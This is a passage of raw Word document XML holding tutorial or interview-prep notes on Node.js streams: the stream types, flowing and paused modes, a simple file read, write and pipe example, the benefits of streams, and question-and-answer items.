      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Writable Streams:</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> Used for writing data to a destination.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D9D6775" w14:textId="77777777" w:rsidR="00C23EE7" w:rsidRPr="00DA2F32" w:rsidRDefault="00C23EE7" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Example: fs.createWriteStream() for writing to files.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A96A867" w14:textId="77777777" w:rsidR="00C23EE7" w:rsidRPr="00DA2F32" w:rsidRDefault="00C23EE7" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Methods:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40C75A66" w14:textId="77777777" w:rsidR="00C23EE7" w:rsidRPr="00DA2F32" w:rsidRDefault="00C23EE7" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>write(chunk): Writes a chunk of data to the stream.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AE3D2DF" w14:textId="77777777" w:rsidR="00C23EE7" w:rsidRPr="00DA2F32" w:rsidRDefault="00C23EE7" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>end(): Signals that no more data will be written to the stream.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="511D8A5B" w14:textId="77777777" w:rsidR="00C23EE7" w:rsidRPr="00DA2F32" w:rsidRDefault="00C23EE7" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Duplex Streams:</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> Implement both readable and writable streams, allowing them to be used for both reading and writing.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75519AA0" w14:textId="77777777" w:rsidR="00C23EE7" w:rsidRPr="00DA2F32" w:rsidRDefault="00C23EE7" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Example: Sockets.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56A5D699" w14:textId="77777777" w:rsidR="00C23EE7" w:rsidRPr="00DA2F32" w:rsidRDefault="00C23EE7" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Transform Streams:</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> A type of duplex stream where the output is computed based on input. Used for modifying or processing data while it's being read or written.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="332689C5" w14:textId="77777777" w:rsidR="00C23EE7" w:rsidRPr="00DA2F32" w:rsidRDefault="00C23EE7" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Example: zlib.createGzip() for compressing data.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68800A67" w14:textId="77777777" w:rsidR="00C23EE7" w:rsidRPr="00DA2F32" w:rsidRDefault="00C23EE7" w:rsidP="009E0607">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Modes of Operation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="131C0855" w14:textId="77777777" w:rsidR="00C23EE7" w:rsidRPr="00DA2F32" w:rsidRDefault="00C23EE7" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Flowing Mode:</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> Data is read automatically and provided via events.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35786279" w14:textId="77777777" w:rsidR="00C23EE7" w:rsidRPr="00DA2F32" w:rsidRDefault="00C23EE7" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Paused Mode:</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> Data must be explicitly read using stream.read().</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66667B45" w14:textId="77777777" w:rsidR="00C23EE7" w:rsidRPr="00DA2F32" w:rsidRDefault="00C23EE7" w:rsidP="009E0607">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Example: Reading and Writing Streams</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="156FDDA0" w14:textId="21C55A24"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7F95EE0E"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Reading a file using a stream</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35DA925C"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readStream = fs.createReadStream('input.txt', 'utf8');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D2DB641"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writeStream = fs.createWriteStream('output.txt');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DB5A57D"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C9AB05C"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Pipe the read stream into the write stream</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="156C8E52"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readStream.pipe(writeStream);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="009C8B8D"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0A256B3"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Handle events</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EE4C687"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readStream.on('data', (chunk) =&gt; {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69A1028B"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console.log(`Received ${chunk.length} bytes of data.`);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44C33DBF" w14:textId="60C8C852"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124A60D"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readStream.on('end', () =&gt; {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4602F626"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console.log('No more data to read.');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60A3B113" w14:textId="11B9D8F8"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2CCFDF2"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writeStream.on('finish', () =&gt; {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D36F0CD"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console.log('Finished writing data.');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FC0B1AF" w14:textId="77777777" w:rsidR="00C23EE7" w:rsidRPr="00DA2F32" w:rsidRDefault="00C23EE7"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E6D3C70" w14:textId="77777777" w:rsidR="00C23EE7" w:rsidRPr="00DA2F32" w:rsidRDefault="00C23EE7" w:rsidP="009E0607">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Benefits of Using Streams</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FB47647" w14:textId="77777777" w:rsidR="00C23EE7" w:rsidRPr="00DA2F32" w:rsidRDefault="00C23EE7" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Memory Efficiency:</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> Streams process data in chunks, reducing memory usage.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="792A8570" w14:textId="77777777" w:rsidR="00C23EE7" w:rsidRPr="00DA2F32" w:rsidRDefault="00C23EE7" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Time Efficiency:</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> Data can be processed as it’s being received, rather than waiting for the entire data to load.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F4E1F6F" w14:textId="77777777" w:rsidR="00C23EE7" w:rsidRPr="00DA2F32" w:rsidRDefault="00C23EE7" w:rsidP="009E0607">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Streams are widely used in Node.js for handling I/O-bound operations like file reading/writing, HTTP requests/responses, and network communication.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DE39F01" w14:textId="77777777" w:rsidR="00C23EE7" w:rsidRPr="00DA2F32" w:rsidRDefault="00C23EE7" w:rsidP="009E0607">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7BAD1337"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1. What are streams in Node.js?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39C7318C" w14:textId="77777777" w:rsidR="00D51823" w:rsidRPr="00DA2F32" w:rsidRDefault="00D51823" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="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Streams are objects in Node.js that allow you to read or write data continuously, without having to load the entire dataset into memory. They are especially useful for working with large data sources, such as files or network requests.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29C49869"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2. What are the different types of streams in Node.js?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7617B1BC" w14:textId="77777777" w:rsidR="00D51823" w:rsidRPr="00DA2F32" w:rsidRDefault="00D51823" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>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There are four types of streams in Node.js:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="060A5EFA" w14:textId="77777777" w:rsidR="00D51823" w:rsidRPr="00DA2F32" w:rsidRDefault="00D51823" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Readable streams</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> (e.g., fs.createReadStream)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56EA6307" w14:textId="77777777" w:rsidR="00D51823" w:rsidRPr="00DA2F32" w:rsidRDefault="00D51823" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Writable streams</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> (e.g., fs.createWriteStream)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78E5E4F2" w14:textId="77777777" w:rsidR="00D51823" w:rsidRPr="00DA2F32" w:rsidRDefault="00D51823" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Duplex streams</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> (e.g., net.Socket)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="268D1D37" w14:textId="77777777" w:rsidR="00D51823" w:rsidRPr="00DA2F32" w:rsidRDefault="00D51823" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Transform streams</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> (e.g., zlib.createGzip)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EA67FDB"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3. How do you create a readable stream in Node.js?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2483A2DE" w14:textId="77777777" w:rsidR="00D51823" w:rsidRPr="00DA2F32" w:rsidRDefault="00D51823" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>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You can create a readable stream using the fs.createReadStream method. For example:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FDFEDC8"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7CB21095"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const readStream = fs.createReadStream('file.txt', 'utf8');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="563318F1"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4. What is the difference between pipe() and unpipe() in streams?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0150B64A" w14:textId="77777777" w:rsidR="00D51823" w:rsidRPr="00DA2F32" w:rsidRDefault="00D51823" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>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pipe() method is used to connect a readable stream to a writable stream, allowing data to flow automatically from one to the other. The unpipe() method is used to detach the readable stream from the writable stream, stopping the automatic flow of data.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="549FA6B5"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readStream.pipe(writeStream);  // Connect streams</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BCB5D67"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readStream.unpipe(writeStream);  // Disconnect stre</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>ams</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13CADE43"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5. What are some common events emitted by streams?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68BD5966" w14:textId="77777777" w:rsidR="00D51823" w:rsidRPr="00DA2F32" w:rsidRDefault="00D51823" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="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Common events include:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="431B8C93" w14:textId="77777777" w:rsidR="00D51823" w:rsidRPr="00DA2F32" w:rsidRDefault="00D51823" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>data: Emitted when a chunk of data is available to be read.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12ECBA2C" w14:textId="77777777" w:rsidR="00D51823" w:rsidRPr="00DA2F32" w:rsidRDefault="00D51823" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>end: Emitted when no more data is available.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EAEEA80" w14:textId="77777777" w:rsidR="00D51823" w:rsidRPr="00DA2F32" w:rsidRDefault="00D51823" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>error: Emitted when an error occurs during streaming.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3766F30A" w14:textId="77777777" w:rsidR="00D51823" w:rsidRPr="00DA2F32" w:rsidRDefault="00D51823" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
